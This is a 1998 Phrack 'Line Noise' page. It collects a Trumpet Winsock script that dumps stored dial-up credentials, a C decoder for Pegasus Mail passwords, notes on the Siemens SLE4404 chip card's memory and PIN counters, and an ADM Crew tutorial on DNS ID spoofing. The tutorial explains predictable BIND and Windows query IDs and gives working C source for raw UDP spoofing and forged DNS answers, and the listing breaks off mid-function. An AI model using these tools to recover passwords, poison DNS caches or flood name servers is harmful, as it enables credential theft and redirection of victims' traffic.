[ News ] [ Paper Feed ] [ Issues ] [ Authors ] [ Archives ] [ Contact ]


..[ Phrack Magazine ]..
.:: Line Noise ::.

Issues: [ 1 ] [ 2 ] [ 3 ] [ 4 ] [ 5 ] [ 6 ] [ 7 ] [ 8 ] [ 9 ] [ 10 ] [ 11 ] [ 12 ] [ 13 ] [ 14 ] [ 15 ] [ 16 ] [ 17 ] [ 18 ] [ 19 ] [ 20 ] [ 21 ] [ 22 ] [ 23 ] [ 24 ] [ 25 ] [ 26 ] [ 27 ] [ 28 ] [ 29 ] [ 30 ] [ 31 ] [ 32 ] [ 33 ] [ 34 ] [ 35 ] [ 36 ] [ 37 ] [ 38 ] [ 39 ] [ 40 ] [ 41 ] [ 42 ] [ 43 ] [ 44 ] [ 45 ] [ 46 ] [ 47 ] [ 48 ] [ 49 ] [ 50 ] [ 51 ] [ 52 ] [ 53 ] [ 54 ] [ 55 ] [ 56 ] [ 57 ] [ 58 ] [ 59 ] [ 60 ] [ 61 ] [ 62 ] [ 63 ] [ 64 ] [ 65 ] [ 66 ] [ 67 ] [ 68 ] [ 69 ] [ 70 ]
Current issue : #52 | Release date : 1998-01-26 | Editor : route
IntroductionPhrack Staff
Phrack LoopbackPhrack Staff
Line Noisevarious
Phrack Prophile on o0Phrack Staff
Everything a hacker needs to know about getting bustedAgent Steal
Hardening the Linux Kerneldaemon9
The Linux pingddaemon9
Steganography Thumbprintingunknown
On the Morality of PhreakingPhrack Staff
A Quick NT Interrogation Probetwitch
Subscriber Loop Carriervoyager
Voice Response Systemsvoyager
Pay Per View (you don't have to)cavalier
The International Crime Syndicate AssociationD. Demming
Digital CertificatesYggdrasil
Piercing Firewallsbishnu
Protected mode programming and O/S developmentmythrandir
Weakening the Linux Kernelplaguez
Phrack World Newsdisorder
extract.cPhrack Staff
Title : Line Noise
Author : various
---[  Phrack Magazine   Volume 8, Issue 52 January 26, 1998, article 03 of 20


-------------------------[  P H R A C K     5 2     L I N E N O I S E


--------[  Various

0x1>-------------------------------------------------------------------------

Upon discovering Doctor Jeep's "Trumpet Winsock Password Hacker" in P51-03, I
felt obligated to share a small piece of code that I don't like to admit
that I created, far earlier than the esteemed Jeep's published work.  As his
requires access to a Pascal compiler and does not seem to be coded with
portability in mind, the fact that my script requires Trumpet itself to run
does not seem too great a hindrance.  The irony is that not only is the
"cipher" a simple obfuscating XOR, but that Trumpet itself will decode it
for you.

<++> password.cmd
# Put in Trumpet Winsock directory, run under "Dialer/Other"
# Cannot currently use any file other than trumpwsk.ini,
# apparently due to implementation errors in the "load" function
display \n
display "Trumpet Password Thief 1.0, 8-18-95"\n
display \n
if [load $username]
        display "username: "
        display $username\n
else
        display "ERR: cannot load username"\n
end
if [load $password]
        display "password: "
        display $password\n
else
        display "ERR: cannot load password"\n
end
display \n
<-->
    
        - anonymous 

0x2>-------------------------------------------------------------------------

Another password decoder for ya... written long ago, I just never bothered to
release it...

<++> peg-dec.c
/*
 * Pegasus Mail Password Decoder v1.0 by Belgorath
 */
#include <stdio.h>

/* Decoding/Encoding Tables */
int dec1[1]= { 44 };
int dec2[2]= { 16, 21 };
int dec3[3]= { 10, 22, 28 };
int dec4[4]= { 37, 28, 21, 7 };
int dec5[5]= { 21, 22, 37, 28, 9 };
int dec6[6]= { 22, 15, 28, 42, 17, 2 };
int dec7[7]= { 15, 17, 21, 31,  0, 12, 19 };
int dec8[8]= {  9,  2,  7, 20, 44, 22, 28, 23 };

int *decz[8] = { dec1,dec2,dec3,dec4,dec5,dec6,dec7,dec8 };

int decode_char(int numch, int ch, int pos)
{
  ch-=decz[numch-1][pos-1];
  if(ch<-127) ch+=256;
  return ch;
}
void main(void)
{
  int zz,x,nc;
  char *tz;
  int inps[20];

  nc=0;
  tz=malloc(8192);
  printf("Enter Pegasus Mail Password: ");
  gets(tz);

/* Fun input parsing loop. Hope your malloc bzero's... */
  while( *tz ) {
    for(x=0;x<strlen(tz)+2;x++) {
      if( (tz[x]==' ') || (tz[x]==0) ) {
        tz[x]=0;
        inps[nc]=atoi(tz);
        nc++;
        tz+=x+1;
        break;
      }
    }
  }

/* Throw away anything past the end */
  for(x=0;x<nc;x++) if(inps[x]==-1) nc=x+1;

/* All pegasus passwords end in -1 */
  if(inps[nc-1]!=-1) {
    printf("Invalid Pegasus Mail Password.\n");
    return;
  }

/* But we throw it away anyway */
  nc--;

  printf("Decoded Password: [");
  for(x=1;x<nc+1;x++) putchar(decode_char(nc,inps[x-1],x));
  printf("]\n");
}
<-->

0x3>-------------------------------------------------------------------------
    
                       :----------------------------:
                        Siemens Chip Card Technology

                       .        by Yggdrasil        .
                       :----------------------------:



  Chip cards differ from one another in memory size, type of memory (PROM or
EEPROM), security logic and micro-controller.  This article will discuss the
Siemens SLE4404 chip card technology.

  The SLE4404 is employed for electronic purse cards and bank transactions,
cellular telephony (pre-payed cards), user IDs for access control, etc. (some
examples: SmartCard, ViaCard and Italian Bancomat).  Its data can be accessed
through a simple TTL serial channel, providing a +5 Vcc power supply from an
external source.


 Inside the chip
 ~~~~~~~~~~~~~~~
  The chipcard has at its disposal EEPROM memory consisting of a 416-bit matrix
(each row is 16-bits) that is protected by security logic providing access 
control.

  This is the logic diagram:

                  +------------------------+     +------------------+
                  |     Address Counter    | --> |  Column Decoder  |
                  +------------------------+     +------------------+
                        ^             |                    | 16
                        |             v                    v
                  +-----------+  +---------+     +------------------+
 C3,C8,C2,C5  --> | Control & |  | Row     |     | User mem 208 bit |
 C1 (Vcc)     --> | Security  |  | Decoder | --> | Sec unit 192 bit |
 C7 (I/O)    <--> | Logic     |  |         | 26  | Special mem unit |
                  +-----------+  +---------+     +------------------+
                        ^                                  ^
                        |                                  |
                        +----------------------------------+

  The SLE4404 memory is subdivided in three main memory blocks: one is read
only (a "PROM" containing the manufacturer code and/or a serial number and
an expiration date), the second is both readable and writeable (user memory)
and the last block cannot be written to unless the lock-out fuse has been 
fused.

  This is the memory map:

  BLOCK TYPE         SIZE (BIT)   ADDRESS   READABLE   WRITEABLE   ERASEABLE
-----------------------------------------------------------------------------
 Manufacturer code       16          0-15     Yes         No           No
 Application ROM         48         16-63     Yes         No           No
 User code               16         64-79    [fuse]      U.C.         U.C.
 Error counter            4         80-83     Yes        Yes          U.C.
 EEPROM #1               12         84-95     Yes        Yes          U.C.
 EEPROM #2               16        96-111     Yes        U.C.         U.C.
 Frame memory block
 - F.M. config            2       112-113     Yes        Yes       U.C./R.C.
 - Frame memory         206       114-319    [cfg]      [cfg]      U.C./R.C.
 Frame code              32       320-351    [fuse]     [fuse]       [cfg]
 Frame counter           64       352-415     Yes        Yes         [cfg]
-----------------------------------------------------------------------------

  Meaning of abbreviations:

 U.C.   -  User code required
           (each time the code is entered the error counter is decreased)
 R.C.   -  Frame code required
           (each time the code is entered the frame counter is decreased)
 [fuse] -  Operation allowed ONLY IF lock-out fuse is not fused
 [cfg]  -  Operation allowed according to frame memory configuration

  Frame memory configuration table:

 BIT 112    BIT 113    MEMORY MODE    READABLE    WRITEABLE
-----------------------------------------------------------------------------
    0          0        Secret ROM      Yes           No
    0          1          R.O.M.        Yes           No
    1          0       Secret PROM      U.C.         U.C.
    1          1         P.R.O.M.       U.C.         U.C.
-----------------------------------------------------------------------------

  The first 16-bit block is for the Manufacturer Code.  The following 48-bit
block is called Application ROM, containing another code (Manufacturer sub
code or info, serial number, sub-type of card, etc).

  The User Code is the access code (PIN) used to read/write/erase memory.  
This code can be modified provided that the fuse was not fused, while the
error counter value can be modified even if the fuse was fused...

  Please note that access to memory is blocked after four incorrect access
trials (checked by the counter).  The same is for the Frame Code and the
Frame [error] Counter (note that the number of incorrect accesses is limited
to three trials instead of four).

  Finally, the Frame Memory is generally used for storing personal user
information or the credit limit (money that can be fetched in a bank 
transaction, or the remaining "virtual" credit that a pre-payed cellular card
contains).


 The Pin-out
 ~~~~~~~~~~~
  This is the Siemens SLE4404 pin-out (N.C. stands for Not Connected):

+-------+-------------------+
|  C 1  |    C  5           |    Contact  Pin   Info
|       |                   |
+-------+           +-------+       1      6    Vcc +5V
|  C 2  |           |  C 6  |       2      5    Reset
|       |           |       |       3      4    Clock
+-------+           +-------+       4      3    Test input - N.C.
|  C 3  |           |  C 7  |       5      8    Ground
|       |           |       |       6      7    N.C.
+-------+           +-------+       7      1    Bi-directional I/O data line
|  C 4  |           |  C 8  |       8      2    Control input (data change)
|       |           |       |
+-------+-----------+-------+

                 "I am for ever walking upon these shores,
                  betwixt the sand and the foam.
                  The high tide will erase my foot-prints,
                  and the wind will blow away the foam.
                  But the sea and the shore will remain
                  For ever."
                                        -- Gibran K. Gibran

0x4>-------------------------------------------------------------------------
                      ___      ______      _       _
                    /     \   |   _   \   |  \   /  |
                   |  / \  |  |  |  \  |  |   \_/   |
                   | |___| |  |  |_ /  |  |   \_/   |
..oO  THE          |  ---  |  |       /   |  |   |  |         CreW Oo..
                   '''   '''   '''''''    ''''   ''''        
                               presents

                           DNS ID Hacking
                    

--[1]-- DNS ID Hacking Presentation

You might be wondering what DNS ID Hacking (or Spoofing) is all about.  DNS ID
Hacking isn't a usual way of hacking/spoofing such jizz or any-erect. This
method is based on a vulnerability on DNS Protocol.  More brutal, the DNS ID
hack/spoof is very efficient and very strong as there is no generation of DNS
daemons that escapes from it (even WinNT!).

--[1.1]-- DNS Protocol mechanism explanation

In the first step, you must know how the DNS works.  I will only explain the
most important facts of this protocol.  In order to do that, we will follow
the way of a DNS request packet from A to Z!

Name resolution example:
The client (bla.bibi.com) sends a request of resolution of the domain
"www.heike.com".  To resolve the name, bla.bibi.com uses "dns.bibi.com" for
DNS.  Let's take a look at the following picture..

/---------------------------------\
| 111.1.2.123  =  bla.bibi.com    |
| 111.1.2.222  =  dns.bibi.com    |
| format:                         |
| IP_ADDR:PORT->IP_ADDR:PORT      |
| ex:                             |
| 111.1.2.123:2999->111.1.2.222:53|
\---------------------------------/
...
  gethosbyname("www.heike.com");
...

[bla.bibi.com]                                 [dns.bibi.com] 
111.1.2.123:1999 ---> [?www.heike.com] ------> 111.1.2.222:53

Here we see our resolution name request from source port 1999 which is asking
to DNS on port 53 (note: DNS is always on port 53).  Now that dns.bibi.com has
received the resolution request from bla.bibi.com, dns.bibi.com will have to
resolve the name:

[dns.bibi.com]                                   [ns.internic.net]
111.1.2.222:53 --------> [dns?www.heike.com] ----> 198.41.0.4:53

dns.bibi.com asks ns.internic.net who the root name server for the address
of www.heike.com is, and if it doesn't have it and sends the request to a name
server which has authority on '.com' domains (note: we send a request to the
Internic because it could have this request in its cache).

[ns.internic.net]                                         [ns.bibi.com]
198.41.0.4:53 ------> [ns for.com is 144.44.44.4] ------> 111.1.2.222:53

Here we can see that ns.internic.net answered to ns.bibi.com (which is the DNS
that has authority over the domain bibi.com), that the name server of for.com
has the IP 144.44.44.4 (let's call it ns.for.com).  Now our ns.bibi.com will
ask to ns.for.com for the address of www.heike.com, but this one doesn't have
it and will forward the request to the DNS of heike.com which has authority
for heike.com.

[ns.bibi.com]                                   [ns.for.com]
111.1.2.222:53 ------> [?www.heike.com] -----> 144.44.44.4:53

The answer from ns.for.com:

[ns.for.com]                                                [ns.bibi.com]
144.44.44.4:53 ------>[ns for heike.com is 31.33.7.4] ---> 144.44.44.4:53

Now that we know which IP address has authority on the domain "heike.com"
(we'll call it ns.heike.com), we ask it what's the IP of the machine 
www.heike.com.

[ns.bibi.com]                             [ns.heike.com]
111.1.2.222:53 -----> [?www.heike.com] ----> 31.33.7.4:53

We now have our answer:

[ns.heike.com]                                             [ns.bibi.com]
31.33.7.4:53 -------> [www.heike.com == 31.33.7.44] ----> 111.1.2.222:53

Great we have the answer, we can forward it to our client bla.bibi.com.

[ns.bibi.com]                                                 [bla.bibi.com]
111.1.2.222:53 -------> [www.heike.com == 31.33.7.44] ----> 111.1.2.123:1999

Now bla.bibi.com knows the IP of www.heike.com.

Now let's imagine that we'd like to have the name of a machine from its IP, in
order to do that, we proceed a bit differently as the IP will have to be
transformed.

Reverse name lookup resolution:
100.20.40.3 will become 3.40.20.100.in-addr.arpa

This method is only for the IP resolution request (reverse DNS).

Let's look at a practical example of when we take the IP address of
www.heike.com (31.33.7.44 or "44.7.33.31.in-addr.arpa" after the translation
into a comprehensible format by DNS).

...
   gethostbyaddr("31.33.7.44");
...

We send our request to ns.bibi.com:

[bla.bibi.com]                                            [ns.bibi.com]
111.1.2.123:2600 -----> [?44.7.33.31.in-addr.arpa] -----> 111.1.2.222:53

Which is forwarded to ns.internic.net:

[ns.bibi.com]                                          [ns.internic.net]
111.1.2.222:53 -----> [?44.7.33.31.in-addr.arpa] ------> 198.41.0.4:53 

ns.internic.net will send the IP of a name server which has authority on
'31.in-addr.arpa'.

[ns.internic.net]                                             [ns.bibi.com]
198.41.0.4:53 --> [DNS for 31.in-addr.arpa is 144.44.44.4] -> 111.1.2.222:53

Now ns.bibi.com will ask the same question to the DNS at 144.44.44.4:

[ns.bibi.com]                                          [ns.for.com]
111.1.2.222:53 ----->[?44.7.33.31.in-addr.arpa]------> 144.44.44.4:53

And so on.  The mechanism is nearly the same that was used for name resolution.

--[1.2]-- DNS packet header

Here is the format of a DNS message :
    +---------------------------+---------------------------+
    |     ID (the famous :)     |  flags                    |
    +---------------------------+---------------------------+
    |   numbers of questions    | numbers of answer         |
    +---------------------------+---------------------------+
    | number of RR authority    |number of supplementary RR |
    +---------------------------+---------------------------+
    |                                                       |
    \                                                       \
    \                   QUESTION                            \
    |                                                       |
    +-------------------------------------------------------+
    |                                                       |
    \                                                       \
    \                    ANSWER                             \
    |                                                       |
    +-------------------------------------------------------+
    |                                                       |
    \                                                       \
    \                  Stuff  etc..    No matter            \
    |                                                       |
    +-------------------------------------------------------+

--[1.3]--  Structure of DNS packets.

__ID__

The ID permits us to identify each DNS packet, since exchanges between name
servers are from port 53 to port 53, and more it might be more than one
request at a time, so the ID is the only way to recognize the different DNS
requests. Well talk about it later..

__flags__

The flags area is divided into several parts :

       4 bits                    3 bits (always 0)
       |                         |
       |                         |
[QR | opcode | AA| TC| RD| RA | zero | rcode ]
                                         |
 |           |__|__|__|                  |______ 4 bits
 |                    |_ 1 bit
 |
1 bit

QR     = If the QR bit = 0, it means that the packet is a question, otherwise
         it's an answer.

opcode = If the value is 0 for a normal request, 1 for a reserve request, and
         2 for a status request (we don't need to know all these modes).

AA     = If it's equal to 1, it says that the name server has an authoritative
         answer.

TC     = No matter

RD     = If this flag is to 1, it means "Recursion Request", for example when
         bla.bibi.com asks ns.bibi.com to resolve the name, the flag tells the
         DNS to assume this request.

RA     = If it's set to 1, it means that recursion is available.  This bit is
         set to 1 in the answer of the name server if it supports recursion.

Zero   = Here are three zeroes...

rcode  = It contains the return error messages for DNS requests if 0, it means
         "no error", 3 means "name error"

The 2 following flags don't have any importance for us.

DNS QUESTION:

Here is the format of a DNS question :

+-----------------------------------------------------------------------+
|                        name of the question                           |
+-----------------------------------------------------------------------+
|       type of question         |      type of query                   |
+--------------------------------+--------------------------------------+

The structure of the question is like this.

example:
www.heike.com  will be [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0] 
for an IP address, the format remains the same.

44.33.88.123.in-addr.arpa would be:
[2|4|4|2|3|3|2|8|8|3|1|2|3|7|i|n|-|a|d|d|r|4|a|r|p|a|0]
[note]: a compression format exists, but we won't cover it.


type of question:

Here are the values that we will use much of the time (there are many more,
but these are only ones relevant):

  name    value
   A    |   1    | IP Address          (resolving a name to an IP)
   PTR  |   12   | Pointer             (resolving an IP to a name)


type of query:

The values are the same as the type of question.

DNS ANSWER:

Here is the format of an answer (an RR)

+------------------------------------------------------------------------+
|      name of the domain                                                |
+------------------------------------------------------------------------+
|   type                           |    class                            |
+----------------------------------+-------------------------------------+
|                           TTL (time to live)                           |
+------------------------------------------------------------------------+
| resource data length       |                                           |
|----------------------------+                                           |
|                       resource data                                    |
+-------------------------------------------------------------------------

name of the domain:

The name of the domain in reports to the following resource:  The domain name
is stored in the same way that the part question for the resolution request of
www.heike.com, the flag "name of the domain" will contain
[3|w|w|w|5|h|e|i|k|e|3|c|o|m|0].

type:

The type flag is the same than "type of query" in the question part of the
packet.

class:
The class flag is equal to 1 for Internet data.

time to live:
This flag explains in seconds the time-life of the information into the
name server cache.

resource data length: 
The length of resource data, for example if resource data length is 4, it
means that the data in resources data are 4 bytes long.

resource data:  
here we put the IP for example (at least in our case)

I will offer you a little example that explains this better:

Here is what's happening when ns.bibi.com asks ns.heike.com for 
www.heike.com's address

ns.bibi.com:53 ---> [?www.heike.com] ----> ns.heike.com:53 (Phear Heike ;)

+---------------------------------+--------------------------------------+
|   ID = 1999                     | QR = 0 opcode = 0 RD = 1             |
+---------------------------------+--------------------------------------+
| numbers of questions = htons(1) | numbers of answers = 0               |
+---------------------------------+--------------------------------------+
| number of RR authoritative = 0  | number of supplementary RR = 0       |
+---------------------------------+--------------------------------------+
<the question part>
+------------------------------------------------------------------------+
|   name  of the question = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0]              |
+------------------------------------------------------------------------+
|  type of question = htons(1)    |      type of query=htons(1)          |
+---------------------------------+--------------------------------------+

here is for the question.

now let's stare the answer of ns.heike.com

ns.heike.com:53 -->[IP of www.heike.com is 31.33.7.44] --> ns.bibi.com:53

+---------------------------------+---------------------------------------+
|   ID = 1999                     | QR=1 opcode=0 RD=1  AA =1  RA=1       |
+---------------------------------+---------------------------------------+
| numbers of questions = htons(1) | numbers of answers = htons(1)         |
+---------------------------------+---------------------------------------+
| number of RR authoritative = 0  | number of supplementary RR = 0        |
+---------------------------------+---------------------------------------+
+-------------------------------------------------------------------------+
|   name  of the question = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0]               |
+-------------------------------------------------------------------------+
|   type of question = htons(1)   |      type of query = htons(1)         |
+-------------------------------------------------------------------------+
+-------------------------------------------------------------------------+
|   name of the domain = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0]                  |
+-------------------------------------------------------------------------+
|       type        = htons(1)    |      class    = htons(1)              |
+-------------------------------------------------------------------------+
|                       time to live = 999999                             |
+-------------------------------------------------------------------------+
| resource data length = htons(4) | resource data=inet_addr("31.33.7.44") |
+-------------------------------------------------------------------------+

Yah! That's all for now :))
 
Here is an analysis:
In the answer QR = 1 because it's an answer :)
AA = 1 because the name server has authority in its domain
RA = 1 because recursion is available

Good =) I hope you understood that cause you will need it for the following
events.

--[2.0]-- DNS ID hack/spoof

Now it's time to explain clearly what DNS ID hacking/spoofing is.
Like I explained before, the only way for the DNS daemon to recognize
the different questions/answers is the ID flag in the packet. Look at this
example:

ns.bibi.com;53 ----->[?www.heike.com] ------> ns.heike.com:53

So you only have to spoof the ip of ns.heike.com and answer your false
information before ns.heike.com to ns.bibi.com!

ns.bibi.com <------- . . . . . . . . . . .  ns.heike.com 
                   |
                   |<--[IP for www.heike.com is 1.2.3.4]<-- hum.roxor.com 

But in practice you have to guess the good ID :) If you are on a LAN, you
can sniff to get this ID and answer before the name server (it's easy on a
Local Network :)

If you want to do this remotely you don't have a lot a choices, you only
have 4 basics methods:

1.) Randomly test all the possible values of the ID flag. You must answer
    before the ns ! (ns.heike.com in this example). This method is obsolete
    unless you want to know the ID .. or any other favorable condition to
    its prediction.

2.) Send some DNS requests (200 or 300) in order to increase the chances
    of falling on the good ID.

3.) Flood the DNS in order to avoid its work. The name server will crash
    and show the following error!

    >> Oct 06 05:18:12 ADM named[1913]: db_free: DB_F_ACTIVE set - ABORT
       at this time named daemon is out of order :)

4.) Or you can use the vulnerability in BIND discovered by SNI (Secure
    Networks, Inc.) with ID prediction (we will discuss this in a bit).  


##################### Windows ID Vulnerability ###########################

I found a heavy vulnerability in Windows 95 (I haven't tested it on
WinNT), lets imagine my little friend that's on Windows 95.
Windows ID's are extremely easy to predict because it's "1" by default :))) 
and "2" for the second question (if they are 2 questions at the same time).


######################## BIND Vulnerability ##############################

There is a vulnerability in BIND (discovered by SNI as stated earlier).
In fact, DNS IS are easily predictable, you only have to sniff a DNS in
order to do what you want. Let me explain...

The DNS uses a random ID at the beginning but it only increase this ID for
next questions ... =)))

It's easy to exploit this vulnerability.
Here is the way:

1. Be able to sniff easily the messages that comes to a random DNS (ex.
   ns.dede.com for this sample).

2. You ask NS.victim.com to resolve (random).dede.com. NS.victim.com will
   ask to ns.dede.com to resolve (random).dede.com

   ns.victim.com ---> [?(rand).dede.com ID = 444] ---> ns.dede.com

3. Now you have the ID of the message from NS.victim.com, now you know what
   ID area you'll have to use. (ID = 444 in this sample).

4. You then make your resolution request. ex. www.microsoft.com to
   NS.victim.com
   
   (you) ---> [?www.microsoft.com] ---> ns.victim.com

   ns.victim.com --> [?www.microsoft.com ID = 446 ] --> ns.microsoft.com
     
5. Flood the name server ns.victim.com with the ID (444) you already have and
   then you increase this one.

 ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 444] --> ns.victim.com
 ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 445] --> ns.victim.com
 ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 446] --> ns.victim.com
 ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 447] --> ns.victim.com
 ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 448] --> ns.victim.com
 ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 449] --> ns.victim.com


(now you know that DNS IDs are predictable, and they only increase. You
flood ns.victim.com with spoofed answers with the ID 444+ ;)

*** ADMsnOOfID does this.


There is another way to exploit this vulnerability without a root on
any DNS

The mechanism is very simple. Here is the explanation

We send to ns.victim.com a resolution request for *.provnet.fr

(you) ----------[?(random).provnet.fr] -------> ns.victim.com

Then, ns.victim.com asks ns1.provnet.fr to resolve (random).provnet.fr.
There is nothing new here, but the interesting part begins here.

From this point you begin to flood ns.victim.com with spoofed answers
(with ns1.provnet.fr IP) with ids from 100 to 110...

(spoof) ----[(random).provnet.fr is 1.2.3.4 ID=100] --> ns.victim.com 
(spoof) ----[(random).provnet.fr is 1.2.3.4 ID=101] --> ns.victim.com 
(spoof) ----[(random).provnet.fr is 1.2.3.4 ID=102] --> ns.victim.com 
(spoof) ----[(random).provnet.fr is 1.2.3.4 ID=103] --> ns.victim.com 
.....

After that, we ask ns.victim.com if (random).provnet.fr has an IP.

If ns.victim.com give us an IP for (random).provnet.fr then we have
found the correct ID :) Otherwise we have to repeat this attack until we
find the ID. It's a bit long but it's effective. And nothing forbids you 
to do this with friends ;)

This is how ADMnOg00d works ;)

-------------------------------



########################################################################## 

Here you will find 5 programs
ADMkillDNS  - very simple DNS spoofer
ADMsniffID  - sniff a LAN and reply false DNS answers before the NS
ADMsnOOfID  - a DNS ID spoofer (you'll need to be root on a NS)
ADMnOg00d   - a DNS ID predictor (no need to be root on a NS)
ADNdnsfuckr - a very simple denial of service attack to disable DNS

Have fun!! :)
Note: You can find source and binaries of this progs at 
ftp.janova.org/pub/ADM. I'm going to make a little HOWTO soon, which would
be on janova. You need to install libpcap on your machine before any
compilation of the ADMID proggies :)


ADM Crew.

Thanks to: all ADM crew, Shok, pirus, fyber, Heike, and w00w00 (gotta love
these guys)
Special Thanks: ackboo, and of course Secure Networks, Inc. (SNI) at
www.secnet.com for finding the vulnerability =)   

<++> ADMIDpack/ADM-spoof.c
/************************************************************************/
/*  ADM spoofing  routine for spoof udp                                 */
/************************************************************************/
  
#define IPHDRSIZE     sizeof(struct iphdr)
#define UDPHDRSIZE    sizeof(struct udphdr)
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <memory.h>

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <netdb.h>
#include <netinet/in.h>
#include "ip.h"
#include "udp.h"


/*****************************************************************************/
/*
 * in_cksum --
 *  Checksum routine for Internet Protocol family headers (C Version)
 */
/*****************************************************************************/

unsigned short in_cksum(addr, len)
    u_short *addr;
    int len;
{
    register int nleft = len;
    register u_short *w = addr;
    register int sum = 0;
    u_short answer = 0;
 
    /*
     * Our algorithm is simple, using a 32 bit accumulator (sum), we add
     * sequential 16 bit words to it, and at the end, fold back all the
     * carry bits from the top 16 bits into the lower 16 bits.
     */
    while (nleft > 1)  {
        sum += *w++;
        nleft -= 2;
    }
 
    /* mop up an odd byte, if necessary */
    if (nleft == 1) {
        *(u_char *)(&answer) = *(u_char *)w ;
        sum += answer;
    }
 
    /* add back carry outs from top 16 bits to low 16 bits */
    sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
    sum += (sum >> 16);         /* add carry */
    answer = ~sum;              /* truncate to 16 bits */
    return(answer);

}



 int udp_send(s,saddr,daddr,sport,dport,datagram,datasize) 
     
     int s;
     unsigned long  saddr;
     unsigned long  daddr;
     unsigned short sport;
     unsigned short dport;
     char           * datagram;
     unsigned       datasize;
{

struct sockaddr_in sin;
struct   iphdr   *ip;
struct   udphdr  *udp;
unsigned char    *data;
unsigned char    packet[4024];
int x;
 
ip     = (struct iphdr     *)packet; 
udp    = (struct udphdr    *)(packet+IPHDRSIZE);
data   = (unsigned char    *)(packet+IPHDRSIZE+UDPHDRSIZE);
       
memset(packet,0,sizeof(packet));

	udp->source  = htons(sport); 
	udp->dest    = htons(dport);
	udp->len     = htons(UDPHDRSIZE+datasize);
	udp->check   = 0;         

        memcpy(data,datagram,datasize);
        
        memset(packet,0,IPHDRSIZE);
        
        ip->saddr.s_addr  = saddr;
        ip->daddr.s_addr  = daddr;
        ip->version  = 4;
        ip->ihl      = 5;
        ip->ttl      = 245;
        ip->id       = random()%5985;
        ip->protocol = IPPROTO_UDP;
        ip->tot_len  = htons(IPHDRSIZE + UDPHDRSIZE + datasize);
        ip->check    = 0;
        ip->check    = in_cksum((char *)packet,IPHDRSIZE);
                                                                        
                                                                        

	sin.sin_family=AF_INET;
	sin.sin_addr.s_addr=daddr;
	sin.sin_port=udp->dest;
	
        x=sendto(s, packet, IPHDRSIZE+UDPHDRSIZE+datasize, 0, 
        		(struct sockaddr*)&sin, sizeof(struct sockaddr));


return(x);
}



/*****************************************************************************/
/*                     RECV PAKET                                            */
/* get_pkt(socket, *buffer , size of the buffer);                            */
/*****************************************************************************/

int get_pkt(s,data,size)
int s;
unsigned char *data;
int size;
{
 struct sockaddr_in sin;
 int len,resu;
 len= sizeof(sin);
 resu=recvfrom(s,data,size,0,(struct sockaddr *)&sin,&len);
 return resu;
}        
<-->
<++> ADMIDpack/ADMDNS2.c
/*************************************************/
/*  DNS include for play with DNS packet (c) ADM */
/*************************************************/

#define   ERROR -1
#define   DNSHDRSIZE 12
#define   TYPE_A   1
#define   TYPE_PTR 12


int myrand()
{
 int j; 
 j=1+(int) (150.0*rand()/(RAND_MAX+1.0));
 return(j);
}


unsigned long  host2ip(char *serv)

{
  struct sockaddr_in sinn;
  struct hostent *hent;
      
  hent=gethostbyname(serv);
  if(hent == NULL) return 0;
  bzero((char *)&sinn, sizeof(sinn));
  bcopy(hent->h_addr, (char *)&sinn.sin_addr, hent->h_length);
  return sinn.sin_addr.s_addr;
 }

  

void nameformat(char *name,char *QS)
{
/* CRAP & LAme COde :) */
char lol[3000];
char tmp[2550];
char tmp2[2550];
int  i,a=0;
bzero(lol,sizeof(lol));
bzero(tmp,sizeof(tmp));
bzero(tmp2,sizeof(tmp2));



  for(i=0;i<strlen(name);i++)
     {
      if( *(name+i) == '.'  ){
          sprintf(tmp2,"%c%s",a,tmp);
          strcat(lol,tmp2);
          bzero(tmp,sizeof(tmp));
          bzero(tmp2,sizeof(tmp2));
          a=0;
          } 
       else  tmp[a++] = *(name+i);
     }
       
 sprintf(tmp2,"%c%s",a,tmp);
 strcat(lol,tmp2);
 strcpy(QS,lol);
 }     



void nameformatIP(char *ip, char *resu)
{
char *arpa = "in-addr.arpa";
char bla[255];
char arf[255];
char haha[255];
char c;
char *A[4];
int i,a=3,k=0;

bzero(bla,sizeof(bla));
bzero(arf,sizeof(arf));
bzero(haha,sizeof(haha));

for(i=0;i<4;i++){
  A[i] =(char *)malloc(4);
  bzero(A[i],4);
 }

bzero(bla,sizeof(bla));
bzero(arf,sizeof(arf));

for(i=0;i<strlen(ip);i++)
  {
   c = ip[i];
    if( c == '.'){
     strcat(A[a],arf); 
     a--;
     k=0;
     bzero(arf,sizeof(arf));
     }
   else arf[k++] = c;
  }
  
  strcat(A[a],arf);
  
 for(i=0;i<4;i++){
    strcat(bla,A[i]);
    strcat(bla,".");
    }
     

strcat(bla,arpa);
nameformat(bla,haha);
strcpy(resu,haha);
}   



int makepaketQS(char *data,char *name,int type)
{

if(type == TYPE_A ){
   nameformat(name,data);
   *( (u_short *) (data+strlen(data)+1) ) = htons(TYPE_A);
 }

if(type == TYPE_PTR){
   nameformatIP(name,data);
   *( (u_short *) (data+strlen(data)+1) ) = htons(TYPE_PTR);
   }
        
   *( (u_short *) (data+strlen(data)+3) ) = htons(1); 
   return(strlen(data)+5);   

}


int makepaketAW(char *data,char *name, char *ip,int type)
{
int i;
char tmp[2550];
bzero(tmp,sizeof(tmp));

if( type == TYPE_A ){
   nameformat(name,data);
   *( (u_short *) (data+strlen(data)+1) ) = htons(1);
   *( (u_short *) (data+strlen(data)+3) ) = htons(1);        
   i=strlen(data)+5;
   strcpy(data+i,data);
   i=i+strlen(data)+1;    
   *((u_short *) (data+i))      = htons(TYPE_A);
   *((u_short *) (data+i+2))    = htons(1);
   *((u_long *) (data+i+4))    = 9999999;
   *((u_short *) (data+i+8))    = htons(4);
   *((u_long *) (data+i+10))   = host2ip(ip);
   return(i+14);
  }

if( type == TYPE_PTR ){
   nameformat(name,tmp);
   nameformatIP(ip,data);
   *( (u_short *) (data+strlen(data)+1) ) = htons(TYPE_PTR);
